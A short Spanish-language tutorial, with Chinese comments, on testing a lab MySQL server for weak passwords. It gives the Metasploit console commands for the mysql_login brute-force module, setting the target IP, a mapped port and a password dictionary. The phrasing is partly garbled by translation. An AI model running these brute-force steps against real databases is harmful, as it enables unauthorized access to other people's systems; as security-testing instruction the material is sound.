Seguridad web: prueba de vulnerabilidad de contraseña débil de la base de datos MySQL.
MySQL es un sistema de administración de bases de datos relacionales.Las bases de datos relacionales almacenan datos en diferentes tablas en lugar de colocar todos los datos en un gran almacén, lo que aumenta la velocidad y mejora la flexibilidad. El lenguaje SQL utilizado por MySQL es el lenguaje estandarizado más utilizado para acceder a bases de datos. El software MySQL adopta una política de autorización dual, que se divide en edición comunitaria y edición comercial. Debido a su pequeño tamaño, alta velocidad, bajo costo general de propiedad, especialmente la función de código abierto, MySQL generalmente se elige como el sitio web para el desarrollo de sitios web pequeños, medianos y grandes.base de datos.
Tabla de contenido:
Seguridad web: prueba de vulnerabilidad de contraseña débil de la base de datos MySQL.
Prueba de vulnerabilidad de contraseña débil de la base de datos MySQL:
Paso 1: verifique el puerto de la base de datos MySQL (el puerto predeterminado es 3306)
Paso 2: Usa el diccionario para descifrar (Usa la consola msf)
Prueba de vulnerabilidad de contraseña débil de la base de datos MySQL:
Paso 1: verifique el puerto de la base de datos MySQL (el puerto predeterminado es 3306)
由于 靶场 的 MySQL 服务端口 3306 映射为主机的 13307 端口.
docker ps // 查看主机 映射端口.
其他 查看端口的方法,可以使用端口扫描工具 nmap 等等...Paso 2: Usa el diccionario para descifrar (Usa la consola msf)
msfconsole //进入msf的控制台.
use auxiliary/scanner/mysql/mysql_login //使用 MySQL 暴力破解脚本 mysql_login
show options \\使用show options命令显示暴力破解的参数.
set RHOSTS 192.168.0.101 //配置 MySQL 服务器的 IP 地址.
set RPORT 13307 //配置 MySQL 服务器端口.(默认3306,如果不是这个则修改)
set PASS_FILE /root/root.txt //配置 字典 进行破解的路径.
run //进行测试.